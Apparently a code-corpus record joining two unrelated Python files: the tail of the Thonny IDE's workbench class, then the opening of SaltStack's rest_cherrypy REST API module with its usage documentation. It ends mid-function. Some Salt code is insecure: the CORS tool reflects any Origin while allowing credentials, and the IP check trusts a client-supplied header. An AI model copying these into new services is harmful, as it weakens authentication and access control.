return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception as e:
logger.exception("Problem processing ipc request", exc_info=e)
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
temp_dir = self.get_temp_dir(create_if_doesnt_exist=False)
if os.path.exists(temp_dir):
try:
shutil.rmtree(temp_dir)
except Exception as e:
logger.error("Could not remove temp dir", exc_info=e)
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
runner = get_runner()
if runner != None:
runner.destroy_backend()
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logger.exception("Error while destroying workbench")
finally:
super().destroy()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
if isinstance(val, KeyboardInterrupt):
# no need to report this, just let it close
return
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logger.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if (
self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS
) and view_name in self._view_records:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor is not None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
if running_on_mac_os() and editor is not None:
current_file = editor.get_filename()
if current_file and is_local_path(current_file) and os.path.exists(current_file):
self.wm_attributes("-titlepath", current_file)
else:
self.wm_attributes("-titlepath", "")
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
def get_temp_dir(self, create_if_doesnt_exist=True):
path = os.path.join(THONNY_USER_DIR, "temp")
if create_if_doesnt_exist:
os.makedirs(path, exist_ok=True)
return path
def _init_hooks(self):
self._save_hooks = []
self._load_hooks = []
def append_save_hook(self, callback):
self._save_hooks.append(callback)
def append_load_hook(self, callback):
self._load_hooks.append(callback)
def iter_save_hooks(self):
return iter(self._save_hooks)
def iter_load_hooks(self):
return iter(self._load_hooks)
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
from salt.ext import six
from salt.ext.six import BytesIO
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user %s from IP %s")
success_str = ("[api_acl] Authentication sucessful for "
"user %s from IP %s")
pass_str = ("[api_acl] Authentication not checked for "
"user %s from IP %s")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug('Found IP list: %s', auth_ip_list)
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug('Request from IP: %s', rem_ip)
if rem_ip not in auth_ip_list:
logger.error('Blocked IP: %s', rem_ip)
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
